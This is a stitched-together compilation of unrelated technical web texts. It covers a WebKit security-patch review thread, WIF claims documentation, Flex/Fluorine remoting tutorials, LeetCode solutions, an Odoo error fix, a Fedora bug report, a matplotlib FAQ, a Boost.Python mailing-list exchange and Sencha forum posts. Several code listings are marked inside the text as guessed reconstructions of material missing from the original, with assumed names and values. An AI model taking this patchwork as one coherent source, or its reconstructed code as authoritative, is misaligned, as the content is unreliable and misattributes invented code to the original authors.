if (enforceMIMEType && document()->page() && !document()->page()->settings()->enforceCSSMIMETypeInStrictMode())
enforceMIMEType = false;
This check was really only necessary for iWeb, and we didn't bother pushing it into import rules. You added the enforceMIMEType variable to the CSSImportRule check but then didn't bother doing anything with it, so it just matches strictParsing.
I don't see a need for that check in sub-stylesheets, so please just get rid of enforceMIMEType in CSSImportRule.
Thanks for taking a detailed look, Dave.
@25: "The CSSParser changes seems iffy to me. Why limit to just a "header" check?
What if you hit an invalid block first and then hit some valid rules following
the invalid block?"
The attacker, unfortunately, can easily inject some valid rules after some preceding junk. So in that case (invalid block then valid rules), we must reject.
Any thoughts re: my comment #27?
If there are still concerns, perhaps we should schedule lunch @ Apple to finally land this thing? I'm currently on vacation but Weds 9th Dec would work. I don't want to delay some form of landed solution too close to the Dec 28th deadline.
@26: I've now had the time to have a more thorough look. I believe the only logic change I made is to add the cross-domain check.
Perhaps the confusion is the rename of "strict" to the more descriptive "enforceMIMEType". So, "enforceMIMEType" is definitely used -- and used with the exact same logic as before the patch.
"(In reply to comment #27)
Except you haven't made it clearer. That variable name is wrong in that context, and the change is unnecessary. Look at HTMLLinkElement:
m_sheet->parseString(sheetText, strictParsing);
Now look at what you did in CSSImportRule:
m_styleSheet->parseString(sheetText, enforceMIMEType);
The argument to parseString is whether or not CSS Is using strict parsing. It's not just about MIME type enforcement. You just didn't need to introduce that variable name here, since that variable was only introduced as a local in the other spot so that it could be set to false if the setting was present.
Thanks, Dave. I see and agree with the concern now.
I fixed it, but ironically, I discovered upon "svn update" that r52032 actually introduces a split of "strict" vs. "enforeMIMEType" to the CSS import code. I'm doing a manual merge now and will post an updated patch shortly.
Created attachment 44830 [details]
Latest patch -- merge with WebKit head
Ok, updated patch attached.
Note that "enforceMIMEType" was introduced by (completely unrelated) r52032. This makes the latest patch smaller, and sort of cancels the clarified complaint in comment #30 :)
Any further changes you would like?
Friendly ping? :)
Now public, via Mozilla checkin and my blog.
Unless there are further comments on the patch, can we get this landed?
Comment on attachment 44830 [details]
Latest patch -- merge with WebKit head
Chris appears to have addressed hyatt's concerns. This security issue is public now and needs to get fixed as soon as possible. The discussion on this bug seems to have stalled.
As far as I can tell, the patch seems fine. Marking as review+. If you have concerns, let me know. If we need to iterate on this after landing, we can do that too.
Committed r52784: <>
Un-hiding; all very public by now and I want to fix the link from
WIF Claims Programming Model
ASP.NET and Windows Communication Foundation (WCF) developers ordinarily use the IIdentity and IPrincipal interfaces to work with the user’s identity information. In .NET 4.5, Windows Identity Foundation (WIF) has been integrated such that claims are now always present for any principal as illustrated in the following diagram:
In .NET 4.5, System.Security.Claims contains the new ClaimsPrincipal and ClaimsIdentity classes (see diagram above). All principals in .NET now derive from ClaimsPrincipal. All built-in identity classes, like FormsIdentity for ASP.NET and WindowsIdentity now derive from ClaimsIdentity. Similarly, all built-in principal classes like GenericPrincipal and WindowsPrincipal derive from ClaimsPrincipal.
A claim is represented by Claim class. This class has the following important properties:
Type represents the type of claim and is typically a URI. For example, the e-mail address claim type is represented as http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress.
Value contains the value of the claim and is represented as a string. For example, the e-mail address can be represented as “someone@contoso.com”.
ValueType represents the type of the claim value and is typically a URI. For example, the string type is represented as http://www.w3.org/2001/XMLSchema#string. The value type must be a QName according to the XML schema. The value should be of the format namespace#format to enable WIF to output a valid QName value. If the namespace is not a well-defined namespace, the generated XML probably cannot be schema validated, because there will not be a published XSD file for that namespace. The default value type is http://www.w3.org/2001/XMLSchema#string. Please see the System.Security.Claims.ClaimValueTypes class for well-known value types that you can use safely.
Issuer is the identifier of the security token service (STS) that issued the claim. This can be represented as the URL of the STS or a name that represents the STS.
OriginalIssuer is the identifier of the STS that originally issued the claim, regardless of how many STSs are in the chain. This is represented just like Issuer.
Subject is the subject whose identity is being examined. It contains a ClaimsIdentity.
Properties is a dictionary that lets the developer provide application-specific data to be transferred on the wire together with the other properties, and can be used for custom validation.
An important property of ClaimsIdentity is Actor. This property enables the delegation of credentials in a multi-tier system in which a middle tier acts as the client to make requests to a back-end service.
To access the current user’s set of claims in an RP application, use Thread.CurrentPrincipal.
The following code sample shows how to use Thread.CurrentPrincipal to get a System.Security.Claims.ClaimsIdentity:
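(The sample itself was not captured in this copy; the following is a minimal sketch of the idea. The class name ClaimsDemo is invented for illustration.)

using System;
using System.Security.Claims;
using System.Threading;

class ClaimsDemo
{
    static void Main()
    {
        // In .NET 4.5 all principals derive from ClaimsPrincipal,
        // so this cast is expected to succeed in an RP application.
        ClaimsPrincipal principal = Thread.CurrentPrincipal as ClaimsPrincipal;
        if (principal != null)
        {
            ClaimsIdentity identity = principal.Identity as ClaimsIdentity;
            foreach (Claim claim in identity.Claims)
            {
                // Print each claim as "type: value".
                Console.WriteLine("{0}: {1}", claim.Type, claim.Value);
            }
        }
    }
}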
For more information, see System.Security.Claims.
Archive for January, 2007 | Monthly archive page
IE, Local Playback, FLVs and Querystrings
I had a problem today with a Flash site converted for playback on CD-ROM: it would work fine in Firefox, but FLV content would not play back in IE.
It turns out that for the web version, if bandwidth had not been detected and tracked, I was appending a ?nocache=[random number] to the filename in order to make sure that the file would load even if cached. On the CD-ROM (or running directly from the hard drive) this would cause a "stream not found" error. Disabling this so that a querystring was not used solved my problem.
Receiving Object Data With .NET/Fluorine/Flex.
So I went through the very basics last time, and while I’m gonna keep it simple, I’m not gonna do a newbie style step-by-step like I did before. For this tutorial I’m going to create a little media library sample for you to work with to show how typed object data can be received via Fluorine.
To start out, download and install the latest version of the Fluorine Gateway. Zoli made some updates since my last posting that will allow your program to run on a shared hosting website. Worked for my last sample anyway. This also goes to show that the folks at The Silent Group are extremely helpful when issues arise with Fluorine. I don't think the guy sleeps.
Setting up the project folder structure
Start out by setting up a project folder structure by creating a master project folder with a Dot Net and a Flex folder in it. Mine is D:\Projects\Flex\Fluorine Flex 2.
Setting up the Visual Studio project
This time we'll use the new Fluorine ASP.NET Web Application template. Fire up Visual Studio and create a new web site project. Select the Fluorine template and set up a virtual web directory that points to the project folder's Dot Net folder. If you tried the last tutorial, you'll quickly figure out that this template saves you a LOT of steps. Once you've created the project, you only have to do one thing to configure Fluorine.
Configuring the Fluorine Gateway in Visual Studio
Open the WEB-INF/flex/services-config.xml file and modify the endpoint node to point to the virtual web directory location of Gateway.aspx. You should be able to copy and paste the actual URL of the Gateway.aspx file into a browser and have a blank page load without any error messages. It's a quick way to check for issues if you are not getting the results you want.
Setting up the Flex project
Start Flex Builder 2 and create a new Flash Data Service Project with the Root folder pointing to the Dot Net folder of your project directory (D:\Projects\Flex\Fluorine Flex 2\Dot Net) and the Root URL pointing to the virtual web directory for the Visual Studio project. The Context root should be the final bit of the virtual web path (/fluorineflex2). Enter the project name (fluorineflex2) and use the Flex directory of your project folder as the location of your Flex project files (D:\Projects\Flex\Fluorine Flex 2).
If you need help with any of the stuff above please check out the previous tutorial.
Creating a C# compact disc value object class
To start out we'll need a value object on the server side to pass back to Flex when requested. Let's create a class called CompactDiscVO that has the properties artist, title, and year.
[csharp]
using System;
namespace com.darbymedia.medialibrary.vo
{
public class CompactDiscVO
{
public string artist;
public string title;
public string year;
public CompactDiscVO(){}
}
}
[/csharp]
Creating a Fluorine Gateway service class
To start out, create a basic service that you can point to with your Flex RemoteObject. We’ll also include a method called getCDVO that will instantiate and return a CompactDiscVO object.
[csharp]
using System;
using System.Web;
using com.darbymedia.medialibrary.vo;
namespace com.darbymedia.medialibrary.service
{
public class MediaLibraryService
{
public MediaLibraryService() { }
public CompactDiscVO getCDVO()
{
CompactDiscVO cd = new CompactDiscVO();
cd.artist = "Redd Kross";
cd.title = "Third Eye";
cd.year = "1990";
return cd;
}
}
}
[/csharp]
Now we can move on to Flex Builder.
Creating a corresponding Actionscript compact disc value object
In Flex Builder 2 create a CompactDiscVO class. I’ve added a toString() method for demonstration purposes (good for debugging too!). Note that the namespace/package path and class name are the same. This is not absolutely necessary but makes sense here.
[actionscript]
package com.darbymedia.medialibrary.vo
{
public class CompactDiscVO extends Object
{
public var artist:String;
public var title:String;
public var year:String;
public function CompactDiscVO(){}
public function toString():String
{
var s:String = "[CompactDiscVO]";
s += "\nArtist: " + artist;
s += "\nTitle: " + title;
s += "\nYear: " + year;
return s;
}
}
}
[/actionscript]
Building the main MXML application file
This time I've decided to use ActionScript only for my RemoteObject file. This way you can compare with the previous tutorial, which used an MXML RemoteObject, if you want. On creationComplete, the initApp() method instantiates the remote object with the destination (the destination name used in the services-config.xml file), the source (the namespace and class path of the C# service class we created), and listeners for result and fault events. Here is the MXML:
[xml]
[/xml]
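The listing above was stripped from this archived copy. Here is a minimal reconstruction of the first version (before registerClassAlias is added); the destination id "fluorine" and all control/handler names are assumptions:

[xml]
<?xml version="1.0" encoding="utf-8"?>
<mx:Application xmlns:mx="http://www.adobe.com/2006/mxml" creationComplete="initApp()">
  <mx:Script>
    <![CDATA[
      import mx.rpc.remoting.RemoteObject;
      import mx.rpc.events.ResultEvent;
      import mx.rpc.events.FaultEvent;
      import com.darbymedia.medialibrary.vo.CompactDiscVO;

      private var ro:RemoteObject;

      private function initApp():void {
        // Destination "fluorine" is assumed from services-config.xml.
        ro = new RemoteObject("fluorine");
        ro.source = "com.darbymedia.medialibrary.service.MediaLibraryService";
        ro.addEventListener(ResultEvent.RESULT, roResult);
        ro.addEventListener(FaultEvent.FAULT, roFault);
        ro.getCDVO(); // call the service immediately
      }

      private function roResult(event:ResultEvent):void {
        trace(event.result);          // [object Object] until the class alias is registered
        trace(event.result.artist);   // Redd Kross
        var cd:CompactDiscVO = event.result as CompactDiscVO;
        trace(cd);                    // null until registerClassAlias() is added
      }

      private function roFault(event:FaultEvent):void {
        trace(event.fault.faultString);
      }
    ]]>
  </mx:Script>
</mx:Application>
[/xml]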
At this point we’re calling the getCDVO method on the service immediately. roResult will trace out information to the console when run in debug mode. Go ahead and do that and you’ll get the following:
[SWF] /fluorineflex2/fluorineflex2/FluorineFlex2-debug.swf – 628,788 bytes after decompression
[object Object]
Redd Kross
null
Interesting. In roResult, our first trace of event.result gives us [object Object] so obviously we’re getting an Object type, but our CompactDiscVO.toString() method is not kicking in. Our second trace of the event.result.artist property, Redd Kross, shows that our data came through but when we try to put it into a typed variable as CompactDiscVO for our third trace we get null. So we are getting data back but it’s not typed correctly. It’s just a generic Object with properties.
To force the correct mapping you have to use the flash.net.registerClassAlias() method. You pass it the full namespace and class name of the server-side class as a string and the ActionScript class you want it to map to, like so:
flash.net.registerClassAlias("com.darbymedia.medialibrary.vo.CompactDiscVO", CompactDiscVO);
I put this in the initApp() method.
Now our MXML looks like this:
[xml]
[/xml]
Run this in debug mode and you can see that our first trace of event.result gives us the toString() output of the CompactDiscVO class, our second trace of event.result.artist gives us Redd Kross, and our third trace of the typed variable, cd, prints out not null, but the toString() output as well! Pretty cool!
Doing something with the content
Now let’s put this data into display items. I’ve added some labels and input fields to hold the data, a button to trigger the return, and an alert for any faults. I’ve put the call to the remote object’s getCDVO in the button’s click handler this time. Check it out:
[xml]
[/xml]
Check it out here.
Sending is easy…next time we’ll do that.
How to Set Up .NET Remoting with Flex 2 and Fluorine.
- Create a project folder. I called mine Fluorine Flex.
- Inside this folder create a folder called Dot Net for the .NET code and a folder called Flex for the Flex code.
- Start Visual Studio. I'm using Visual Studio 2005 Standard Edition.
- File -> New -> Web Site
- In the dialog box, select Empty Website.
- In the language dropdown select C#.
- In the location dropdown section select http.
- On the right select Browse.
- In the new dialog on the left select Local IIS.
- On the top right select Create new virtual directory.
- Enter an alias name. I entered fluorineflex.
- Browse and select the Dot Net folder in your project folder and select OK.
- Now select the virtual directory you just created and select OK.
- In the Solution Explorer, right-click the project icon and select Add Reference.
- Under the .NET tab locate and select Fluorine and select OK.
- Right-click the project icon and select Add New Item. Choose Web Configuration File, leave the name as is, and select Add.
- In the system.web node of the new Web.config file add the following, and save:
[xml]
[/xml]
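The [xml] block above was stripped in this archived copy. For Fluorine the registration adds an httpModules entry; the module and assembly names below are assumptions based on the Fluorine of that era, so check your own install:

[xml]
<httpModules>
  <!-- assumed type/assembly names; verify against your Fluorine installation -->
  <add name="FluorineGateway"
       type="com.TheSilentGroup.Fluorine.FluorineGateway, com.TheSilentGroup.Fluorine" />
</httpModules>
[/xml]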
- Right-click the project icon and select Add Item. Choose Web Form and name the file Gateway.aspx.
- Right-click the project icon and select New Folder. Name it WEB-INF.
- Right-click the new WEB-INF folder and select New Folder. Name it flex.
- Right-click the new flex folder and select Add New Item. Choose XML File and name it services-config.xml.
- Open the new services-config.xml and paste the following content below the initial xml tag:
[xml]
*
[/xml]
In the endpoint node change the uri property to point to Gateway.aspx in the virtual directory that you created.
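The block above was mostly stripped (only a stray '*' survived). It normally defines a remoting service and an AMF channel; a plausible reconstruction, with the destination id "fluorine" used later in this post and an assumed localhost URI, is:

[xml]
<services-config>
  <services>
    <service id="remoting-service"
             class="flex.messaging.services.RemotingService"
             messageTypes="flex.messaging.messages.RemotingMessage">
      <destination id="fluorine">
        <channels>
          <channel ref="my-amf"/>
        </channels>
        <properties>
          <!-- the surviving '*' most likely came from this source wildcard -->
          <source>*</source>
        </properties>
      </destination>
    </service>
  </services>
  <channels>
    <channel-definition id="my-amf" class="mx.messaging.channels.AMFChannel">
      <endpoint uri="http://localhost/fluorineflex/Gateway.aspx"
                class="flex.messaging.endpoints.AMFEndpoint"/>
    </channel-definition>
  </channels>
</services-config>
[/xml]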
- Download and install Flex Data Services 2 Express from the Flex download page. (Not necessary – thanks Richard!) No serial number is necessary for development work.
- Start Flex Builder 2.
- File -> New -> Flex Project.
- Select Flex Data Services.
- Select Compile application locally in Flex Builder.
- Uncheck Use default local Flex Data Services Location.
- In Root folder select Browse and select the Dot Net folder in your project folder. For me it was D:\Projects\Flex\Fluorine Flex\Dot Net.
- In Root URL enter the path to the virtual directory created earlier.
- As far as I can tell, Context root should be the last folder name of your virtual web directory. Mine was /fluorineflex.
- Uncheck the Use default location box and select the Flex folder in your project folder. In my case it's D:\Projects\Flex\Fluorine Flex\Flex.
- Select Finish.
- In Visual Studio, right-click the project icon and select Add New Item. Choose Class and name it FlexService.cs. (You can name the class anything you want at this point. I'll use FlexService.)
- When prompted to put the file in an App_Code folder, click Yes.
- At this point you'll only need to "use" System and System.Web, but it won't hurt to leave the other classes.
- I've cleaned up mine and given it a fancy namespace (com.darbymedia.flex) to look like this:
[csharp]
using System;
using System.Web;
namespace com.darbymedia.flex
{
public class FlexService
{
public FlexService() { }
}
}
[/csharp]
- Add a function called echo and have it return the message that is sent, and our class looks like this:
[csharp]
using System;
using System.Web;
namespace com.darbymedia.flex
{
public class FlexService
{
public FlexService() { }
public string echo(string msg)
{
return "echo(msg) msg: " + msg;
}
}
}
[/csharp]
- Return to Flex Builder 2.
- Create a RemoteObject with the following properties:
- destination: fluorine. This is the destination set up in the services-config.xml file.
- source: com.darbymedia.flex.FlexService. This is the namespace and class name for our service.
- result: roResult. This is the method to receive the return value. We'll do this in a minute.
- fault: roFault. This is the method to receive any errors. We'll make this in a sec too.
Adding an input field, submit button, output text area, and a bad call button, your mxml will look like this:
[xml]
[/xml]
- Now to create the roResult and roFault methods as well as button handlers. They look like this:
[xml]
[/xml]
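Both [xml] listings above were stripped from this archived copy. Under the assumptions in the bullets (a RemoteObject with id "ro", result handler roResult, fault handler roFault), the script block would have looked roughly like this; the control ids are invented:

[xml]
<mx:Script>
  <![CDATA[
    import mx.controls.Alert;
    import mx.rpc.events.ResultEvent;
    import mx.rpc.events.FaultEvent;

    // Show whatever the echo service returned (assumes a TextArea with id "output").
    private function roResult(event:ResultEvent):void {
      output.text = String(event.result);
    }

    // Any server-side error lands here.
    private function roFault(event:FaultEvent):void {
      Alert.show(event.fault.faultString, "Error");
    }

    // Submit button: call the echo method on the service (assumes a TextInput "msgInput").
    private function submitClick():void {
      ro.echo(msgInput.text);
    }

    // Bad call button: call a method that doesn't exist to exercise roFault.
    private function badCallClick():void {
      ro.noSuchMethod();
    }
  ]]>
</mx:Script>
[/xml]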
- Now that we have our RemoteObject set up, we can call any method within our service class directly.
I've finally gotten the bug to get this Flex thing going, and my only stumbling block for really useful applications was that for server-side stuff I'm way more adept with Visual Studio .NET and C# than I am with PHP. I had been looking for a solution and found WebOrb, which requires a server install and isn't free for AMF3. Since I use shared hosting this is really not an option. Then I found Fluorine, created by Zoltan Csibi at The Silent Group, which is open source and, after a bit of teeth gnashing, easy to set up. After finding Sam Shrefler's excellent examples I decided to put together something that was a bit more basic than his Cairngorm examples (not that those weren't basic and very helpful!).
I’m going to start out with something extremely simple just to demonstrate the setup. The service will basically echo back any string you send to it. I saw this morning as I got the latest update that it installs a Visual Studio project template that is probably the best way to go when setting things up, but I’ve decided to go ahead and go through the steps of setting things up manually so that hopefully the purpose of the elements is more clear.
Download and Install the Fluorine Gateway
Go to the Fluorine download page and download and install the Fluorine Windows Installer.
Setting Up Project Folders
Creating the Project in Visual Studio .NET
Configuring the Project in Visual Studio .NET
I gleaned this mostly from Setting up a Flash Remoting-enabled ASP.NET application at the Fluorine site.
The next part is from the Flex 2 basic setup section within Using Flex 2 and AMF3 on the Fluorine site.
Configuring the Flex Project
Now we’re ready to ROCK!
Creating a Fluorine Service in .NET
Accessing the Service via Fluorine in Flex
Now the entire mxml file looks like this:
[xml]
[/xml]
Give it a whirl! Type a message and submit it. Then click the bad call button to see what happens when an error occurs.
Here’s what it’s supposed to look like.
This is super basic but it should get you up and running. Next I’ll be sending and receiving objects, but something tells me you’ll figure that out on your own!!
SWFObject: Use It DAMMIT!
Or at least use something! I'm continually seeing professional-level sites that directly embed SWFs and, to my dismay, display "click to enable" messages in IE. At this point it really drives me up a wall.
Get a clue. News Alert: Due to some silly lawsuit, in IE when you embed a swf in a website the tag must be written by an externally linked javascript file. This is well known. You’re a professional. FIX IT. JEBUS.
I'm not gonna embarrass anyone by including examples, but don't show off your fancy blinking, flickering Flash or, worse yet, provide a link to your client's flawed embeds and try to impress anyone. You're doing your clients and your potential clients a disservice, since they probably don't understand.
Be a pro. Do it right. Visit everyone’s friend Geoff Stearns at Deconcept, get SWFObject and USE IT.
Good Riddance 2006
What started out as an exciting, hopeful, successful year ended with a flop, just barely dragging over the finish line. Other than the great music I saw and the new friends I made, career-wise things have just not panned out over the last eight months.
What 2007 holds is yet to be seen. I’m looking for a new ActionScript coder job in the Atlanta area which hopefully will put the excitement, hope, and success back into my future. If anyone has any leads please let me know! (brentpub [at] darbymedia [dot] com)
The problem Rank Transform of an Array Leetcode Solution provides us with an array of integers. The array or the given sequence is unsorted. We need to assign ranks to each integer in the given sequence. There are some restrictions for assigning the ranks.
- The ranks must start with 1.
- The larger the number, the higher the rank (larger in numeric terms).
- Ranks must be as small as possible for each integer.
So, let’s take a look at a few examples.
arr = [40,10,20,30]
[4,1,2,3]
Explanation: It will be easier to understand the example if we sort the given input. After sorting, the input becomes [10, 20, 30, 40]. Now, if we follow the given rules, the ranks will be [1, 2, 3, 4] as per the sorted array. If we match the elements with the output, they are the same, confirming the correctness of the output.
arr = [100,100,100]
[1, 1, 1]
Explanation: Since all the elements in the input are the same, all must have the same rank, which is 1. Hence the output contains three instances of 1.
Approach for Rank Transform of an Array Leetcode Solution
The problem Rank Transform of an Array Leetcode Solution asks us to assign ranks to the given sequence. The conditions to be met are already stated in the problem description, so instead of describing them once again, we will go through the solution directly. As seen in the example, it's easier to assign ranks to a sorted sequence. So, we use an ordered map to store the elements of the given input sequence; an ordered map keeps its keys in sorted order.
Now, we must deal with the third condition, which states that we must assign the smallest possible ranks. So, we simply assign numbers from 1 upward to the keys present in the map. This takes care of all three imposed conditions: the rank of larger numbers is higher, the ranks start from 1, and they are as small as possible.
Now, we simply traverse through the input sequence and assign the ranks stored in the map.
Code
C++ code for Rank Transform of an Array Leetcode Solution
#include <bits/stdc++.h>
using namespace std;

vector<int> arrayRankTransform(vector<int>& arr) {
    map<int, int> m;
    for (auto x : arr)
        m[x] = 1;
    int lst = 0;
    for (auto x : m) {
        m[x.first] = lst + 1;
        lst++;
    }
    for (int i = 0; i < arr.size(); i++)
        arr[i] = m[arr[i]];
    return arr;
}

int main() {
    vector<int> input = {40, 10, 30, 20};
    vector<int> output = arrayRankTransform(input);
    for (auto x : input)
        cout << x << " ";
}
4 1 3 2
Java code for Rank Transform of an Array Leetcode Solution
import java.util.*;
import java.lang.*;
import java.io.*;

class Main {
    public static int[] arrayRankTransform(int[] arr) {
        Map<Integer, Integer> m = new TreeMap<Integer, Integer>();
        for (int x : arr)
            m.put(x, 1);
        int lst = 0;
        for (Integer x : m.keySet()) {
            m.put(x, lst + m.get(x));
            lst = m.get(x);
        }
        for (int i = 0; i < arr.length; i++)
            arr[i] = m.get(arr[i]);
        return arr;
    }

    public static void main(String[] args) throws java.lang.Exception {
        int[] input = {40, 10, 30, 20};
        int[] output = arrayRankTransform(input);
        for (int x : output)
            System.out.print(x + " ");
    }
}
4 1 3 2
Complexity Analysis
Time Complexity
O(N log N), since we used an ordered map; insertion, deletion, and search each carry a logarithmic factor.
Space Complexity
O(N), because we use an ordered map to store the elements in the input.
How to resolve "Integrity Error" on change.password.user when deleting a user after changing his/her password?
The steps to replicate this issue are as follows:
Create a new user (from Odoo "Users" menu)
Set the new user's password (which can be anything, apparently)
Delete that new user.
The error I got was
Integrity Error
The operation cannot be completed, probably due to the following:
- deletion: you may be trying to delete a record while other records still reference it
- creation/update: a mandatory field is not correctly set
[object with reference: Change Password Wizard User - change.password.user]
From what I Googled, it seems that the reason is that the "change.password.user" table (the actual database table name is "change_password_user") still contains a reference to the user I'm trying to delete. But why is that so? And how do I fix this problem? Should I manually delete the entry in the change.password.user table?
You could make a fix module with this Python code:
from odoo import api, models  # on Odoo <= 9 use: from openerp import api, models

class ResPartner(models.Model):
    _inherit = 'res.partner'

    @api.multi
    def unlink(self):
        # Clear stale change-password wizard rows that still reference the
        # record being deleted. (change_password_user.user_id points at
        # res.users, so inheriting 'res.users' may fit your case better.)
        for record in self:
            self.env.cr.execute(
                "DELETE FROM change_password_user WHERE user_id=%s;",
                (record.id,))
        # The original post was truncated here ("record.un"); calling the
        # parent unlink() is the standard way to finish the override.
        return super(ResPartner, self).unlink()
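If you prefer the one-off manual cleanup the question mentions (assuming direct database access), the equivalent SQL is:

DELETE FROM change_password_user WHERE user_id = <id of the user to delete>;

change.password.user is a transient wizard model, so clearing its stale rows is generally safe.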
Description of problem:
Kombu appears to depend on the ``vine`` Python module, but it's not installed.
Version-Release number of selected component (if applicable):
python3-kombu-4.0.2-1.fc26.noarch
How reproducible: Always
Steps to Reproduce:
1. sudo dnf install python3-kombu
2. Open a Python 3 shell
3. ``from kombu import five``
Actual results:
[vagrant@rawhide yum.repos.d]$ python3
Python 3.6.0 (default, Dec 27 2016, 20:50:38)
[GCC 6.3.1 20161221 (Red Hat 6.3.1-1)] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from kombu import five
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/usr/lib/python3.6/site-packages/kombu/five.py", line 6, in <module>
import vine.five
ModuleNotFoundError: No module named 'vine'
>>> quit()
[vagrant@rawhide yum.repos.d]$ rpm -q python3-kombu
python3-kombu-4.0.2-1.fc26.noarch
Expected results:
Successfully import all modules
Yes, that was overlooked somehow. It is submitted for review, and I already asked for a review swap on devel@f.o
A dependency of vine (python-case) was packaged and included in rawhide yesterday.
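For reference, the fix on the packaging side is declaring the missing runtime dependency in the python3-kombu spec, roughly like this (a sketch; the actual spec line may differ or be generated automatically):

# python3-kombu.spec (sketch)
Requires:       python3-vine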
Can I use matplotlib to generate graphs from my data?
Yes, you can; your graph will be saved as an image file in your home directory.
The block of code below gives you an example of how you would do this:
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt

fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(range(100))
fig.savefig("graph.png")
graph.png will then show up in your home directory. Simply put, wherever you might normally use plt.show() to display your graph on screen, you should use fig.savefig('your_graph.png') to save it as an image file instead.
Once you've done that, you can view the graph from your browser by opening the saved image from your Files tab.
What to do if you're seeing errors about Tkinter
Make sure to include the matplotlib.use("Agg") line from the example above; that's the bit that sets the "backend" that matplotlib uses to draw graphics. Tkinter is the default, but it won't work on PythonAnywhere. Agg works fine. (See this page on tkinter for more info.)
Jupyter Notebooks
With all that said, probably your best bet for working interactively with data and graphs is to use a Jupyter Notebook. That's a premium feature on PythonAnywhere however...
The code is clean and easy to understand. I wrote this because I saw some other solutions keep comparing the current distance with the min distance, which is kind of a waste of time, so I came up with the idea to compare only when needed.
public class Solution {
    public int shortestDistance(String[] words, String word1, String word2) {
        int idx1 = -1, idx2 = -1;
        int dis = Integer.MAX_VALUE;
        for (int i = 0; i < words.length; i++) {
            String word = words[i];
            if (idx1 * idx2 <= 0) { // at least one of the two has been seen
                if (word1.equals(word)) { // word1 found
                    idx1 = i;
                    if (idx2 != -1) { // guard: only measure against a real word2 position;
                                      // without it, a repeated word1 before any word2
                                      // contaminates dis with idx1 + 1
                        dis = Math.min(dis, idx1 - idx2);
                        idx2 = -1; // set word2 not found
                    }
                }
                if (word2.equals(word)) { // word2 found
                    idx2 = i;
                    if (idx1 != -1) {
                        dis = Math.min(dis, idx2 - idx1);
                        idx1 = -1; // set word1 not found
                    }
                }
            } else { // neither found yet
                if (word1.equals(word)) idx1 = i;
                if (word2.equals(word)) idx2 = i;
            }
        }
        return dis;
    }
}
"Ralf W. Grosse-Kunstleve" <rwgk at yahoo.com> writes: > --- David Abrahams <dave at boost-consulting.com> wrote: >> > This solution is based on what I found in SWIG-1.3.24/Lib/python/pyrun.swg. >> > At the heart of the solution is this simple fragment: >> > >> > static void* extract(PyObject* op) \ >> > { \ >> > if (std::strcmp(op->ob_type->tp_name, "PySwigObject") != 0) >> > return 0; \ >> >> Isn't there a type object somewhere you can compare ob_type with? > > It seemed hard to me. Here is what I understand: > > SWIG is a wrapper generator (more similar to Pyste than to Boost.Python). In > the SWIG-1.3.24/Examples/python/class that I was using, SWIG copies a big chunk > of code into the generated example_wrap.cxx. This includes the complete > definition of the type object for PySwigObject. The type definition is > implemented as a group of static objects in this function: > > SWIGRUNTIME PyTypeObject* > PySwigObject_GetType(); > > We'd have to get hold of this function, which I believe will complicate the > linking severely. But even if we did, it wouldn't get us very far since each > SWIG-generated extension has its own version of the type object, with its own > address. That's probably why I found this function: > > SWIGRUNTIMEINLINE int > PySwigObject_Check(PyObject *op) { > return ((op)->ob_type == PySwigObject_GetType()) > || (strcmp((op)->ob_type->tp_name,"PySwigObject") == 0); > } > > I am still wondering why SWIG does "one or the other" and not simply the more > general "other". The best explanation I can find for myself is optimization for > speed (pointer equivalence vs. string comparison). Anyway, for me the > conclusion was clear: it is definitely not worth complicating the build process > for such a minute gain. If the Python/C++ combination is used sensibly the > runtime difference will be unmeasurable anyway. You have grown very wise, O grasshopper. >> Heh, so that's how they do it. Pretty lame, IMO. > > Hey, let's be politically correct: Pretty basic, at that level. > They decided to put all their energy into a special parser, which > clearly has some advantages if you have to deal a lot with C-style > interfaces. E.g. the int* question is coming up a lot. You shall now be my master. >> Well, inheritance >> won't work; a swig-wrapped Derived won't be able to be passed where a >> Base is expected. If that doesn't matter, it's fine. > > Is there a way to write something like: > > bases_of<Circle, mpl::vector<Shape> >(); In principle, yes, but it would take some nontrivial coding. >> > boost_python_swig_args_ext.show(c.this) >> > boost_python_swig_args_ext.show(s.this) >> >> You should have part of the test that shows non-matching types are >> rejected. > > I figured rejection is tested since the overload resolution couldn't work > otherwise. Oh, are you testing overload resolution? If so, that's enough. > What exactly do you have in mind? > >> > David, would you want to include the core of swig_args_ext.cpp in, >> > e.g., boost/python/swig_arg.h? I think it would be a valuable >> > addition. There are many SWIG-wrapped libraries. People could easily >> > use them while writing their own extensions with Boost.Python. >> >> Sounds great! Needs docs, of course ;-) > > Would you be happy with a page like I wrote for the pickle suite, > linked from the main page, e.g. "SWIG interoperability"? Great! > But I still have a question. I don't really like the interface I came up with > since it requires two steps: > > 1. BOOST_PYTHON_SWIG_ARG(Circle) > > 2. 
swig_arg<Circle>(); > > It would be nicer if one could simply write > > swig_arg<Circle>("Circle"); > > Is there any way this could be achieved?. > Actually, here is another question: would it be best to wait until Boost 1.33 > is out? We are in a main trunk feature-freeze, but doing it now on a branch would be better than waiting. -- Dave Abrahams Boost Consulting
- 24 Nov 2012 11:22 AM
I've changed my code (without "()"), but the problem is present again...
I've also used your example
Ext.Msg.alert('Hello', 'Hi');
but no message is displayed...
- 24 Nov 2012 11:15 AM
If I don't use ui="round" the problem is not present. The problem occurs with ui="round" only...
- 24 Nov 2012 3:56 AM
If I create a native app for iOS, the last list item appears as in the attached image.
- 24 Nov 2012 12:29 AM
This function works in Chrome and doesn't work in iOS:
getData: function(url,methodName,args,fnSuccessCallback,scope,timeout,waitMsgCmp,fnErrCallback) {
...
- 24 Nov 2012 12:24 AM
I'm using this function in my app:
alertPopup: function(msg, caption, fnCallback) {
if(caption===undefined||caption===null){
caption="Messaggio";
}
...
- 21 Nov 2012 12:35 PM
I have used Ext.data.JsonP in my Sencha 2.1.0 app and it works when I run it in the browser. I'm using Sencha Architect, and after iOS packaging, when I try my app on a device (or simulator), no data are...
- 21 Nov 2012 12:26 PM
I have used Ext.Msg.alert in my Sencha 2.1.0 app and it works when I run it in the browser. I'm using Sencha Architect, and after iOS packaging, when I try my app on a device (or simulator), no messages...
- 28 Feb 2012 7:28 AM
Yes, my component extends Mitchell Simoens' component. I only apply the filter feature to it...
- 28 Feb 2012 7:26 AM
You can find a little image here:
- 27 Feb 2012 12:44 PM
This week is very hard for me and it's difficult to find time to change the grid code. I'm very happy about your discovery about the datepicker and I will try to work on it on my weekend, but if you...
- 23 Feb 2012 12:05 PM
